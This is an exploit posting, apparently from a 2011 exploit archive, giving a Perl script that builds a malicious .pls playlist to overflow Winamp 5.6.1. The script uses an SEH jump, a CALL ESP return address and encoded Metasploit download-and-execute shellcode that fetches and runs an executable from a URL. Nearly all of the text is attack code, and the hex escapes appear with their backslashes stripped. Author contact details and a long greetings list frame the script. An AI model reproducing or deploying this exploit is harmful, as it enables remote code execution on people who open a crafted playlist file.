Home / exploitsPDF  

Winamp 5.6.1 .pls Remote Command Execution

Posted on 14 April 2011

#!/usr/bin/perl

###
# Title : Winamp 5.6.1 (.pls) Remote Command  Execution
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com || ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Command  Execution / Download and Exec / Crashs...
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Ked & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [»] ~ special thanks to : jos_ali_joe (exploit-id.com) , and All exploit-id Team
###
# =============
my $junk = "http://";
my $buffer = "x41" x 1321;
my $seh = "xebx06x90x90" ; # short jump
my $eip = "xadx86x0ex07"; # CALL ESP nde.dll
my $nop = "x90" x 32;
# =============
# windows/download_exec (http://www.metasploit.com)
# Encoder: x86/alpha_mixed
# URL= http://127.0.0.1:8888/ked/k.exe
my $shellcode =
"x56x54x58x36x33x30x56x58x48x34x39x48x48x48" .
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" .
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" .
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" .
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" .
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" .
"x42x41x42x58x50x38x41x42x75x4ax49x4ax4bx46" .
"x70x42x7ax42x6ax45x63x48x49x50x66x4ex59x45" .
"x6cx47x71x4dx50x45x64x45x5ax4cx59x4bx52x49" .
"x6ax48x6bx47x75x4dx38x4ax4bx4bx4fx4bx4fx49" .
"x6fx44x30x50x4cx4fx69x4ax39x4fx69x4bx73x49" .
"x6dx45x68x4dx79x4ex79x4fx69x4dx49x42x32x4b" .
"x69x4ex75x45x42x48x69x4fx75x46x54x47x62x4a" .
"x79x4cx51x44x52x51x51x44x52x4bx5ax49x35x45" .
"x42x4ax4dx4dx57x4bx51x4fx6ax42x4ax42x32x4b" .
"x57x4ex59x4dx4ax51x72x42x32x48x57x4cx4dx4d" .
"x7ax50x74x48x4fx48x4ex4ax68x42x32x4fx56x4e" .
"x7ax50x62x45x42x42x4bx4bx43x4ex77x49x50x43" .
"x5ax45x6fx48x6dx4ex71x4fx30x4ax66x44x5ax51" .
"x4ex4fx6dx49x4cx51x6bx44x30x4bx70x4ax66x4f" .
"x37x42x32x42x74x45x42x49x4fx4fx4dx4ex7ax50" .
"x5ax47x38x42x58x4cx5ax42x78x4fx5ax50x50x4b" .
"x4fx46x72x4ex71x47x62x49x4fx4ex65x4dx4ax42" .
"x7ax50x58x42x58x4fx6bx4dx4ax46x38x47x62x4a" .
"x39x4cx5ax42x7ax45x42x45x33x46x72x42x4ex46" .
"x7ax43x6fx4ax37x47x62x42x69x4bx43x4fx6dx4f" .
"x30x51x61x4fx39x4cx59x4cx59x4ax39x44x5ax51" .
"x4fx4cx54x48x4bx4ax6fx50x66x48x4ex51x75x48" .
"x43x46x72x43x71x48x73x4ax38x4fx30x50x71x4f" .
"x54x4ex79x4cx59x4ax39x45x4ax43x6fx4dx5ax4a" .
"x6fx4bx6fx42x39x4fx57x45x49x48x6cx45x33x46" .
"x79x4ex4fx45x49x48x47x47x6ax42x55x48x39x44" .
"x52x42x65x48x73x4cx79x48x4ax51x76x4ax6ex43" .
"x45x51x4ex4dx4dx4dx4ax49x55x49x68x4dx67x49" .
"x6cx43x6ex4bx6dx4fx6ax4fx6dx4bx51x49x6cx4d" .
"x49x4fx69x4cx6ax46x39x4fx39x48x49x4ax6ax4a" .
"x6fx4fx39x45x36x4ax6ex43x55x42x32x51x55x49" .
"x59x4bx7ax51x76x48x4ex51x79x4ax69x50x66x4a" .
"x6ex42x4dx4dx7ax51x49x50x35x47x6cx50x59x4a" .
"x4cx45x30x4ax68x48x4bx4ax6fx4bx7ax43x56x42" .
"x6bx48x43x4bx70x46x52x43x4bx43x47x4ex4ax51" .
"x49x50x5ax42x51x4dx6fx45x36x50x66x51x76x49" .
"x4ex4bx4cx4ax4dx48x49x4ax4bx4ax56x4ax5ax48" .
"x58x4bx4dx4bx4dx48x6bx4bx4cx48x6ax4ax4ax4c" .
"x59x49x4ex49x6cx4ax4dx49x5ax4bx50x49x7ax48" .
"x6dx49x6cx49x64x4bx6dx4cx30x48x6bx49x6cx4a" .
"x5ax48x6dx4ax56x4ax4bx49x70x4ax78x4ax39x4a" .
"x6ex4ax50x4bx47x4bx6cx49x71x49x6cx4ax5ax4f" .
"x69x4bx6cx48x61x4ax50x4ax4dx48x4dx4cx31x48" .
"x6bx4bx4cx48x78x4bx4dx4dx49x49x45x4bx46x48" .
"x78x49x6dx4bx65x48x70x4bx4bx4ax4bx4ax58x4a" .
"x4bx4dx30x4bx68x4cx59x48x6cx48x6bx48x75x4b" .
"x44x4ax56x48x77x4fx69x4ax6cx4ax6bx49x45x49" .
"x4dx4cx36x4ax4ex48x77x48x75x4ax56x4bx48x49" .
"x6dx48x4dx49x66x4bx6fx4cx30x48x75x49x6cx4e" .
"x38x4ax39x42x48x51x64x51x64x42x50x47x4ax44" .
"x6fx44x6fx50x31x44x72x50x37x44x6ex50x30x46" .
"x4ex50x30x44x6ex46x51x44x7ax44x78x50x38x46" .
"x58x46x58x44x6fx50x6bx45x35x51x74x46x4fx42" .
"x4bx44x6ex43x55x51x68x50x65x4bx30x41x41";
# =============
my $header="[playlist]
".
"NumberOfEntries=1
".
"File1=";
my $finalnop = "x90" x 543;
# =============
open(myfile,'>> KedAns.pls');
print myfile $header.$junk.$buffer.$seh.$eip.$nop.$shellcode.$finalnop;
close (myfile);

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org)
# Nayla Festa * all (sec4ever.com) Members * KelvinX (kelvinx.net) * PLATEN (Pentesters.ir)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-db.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================

 

TOP

Malware :

Exploits :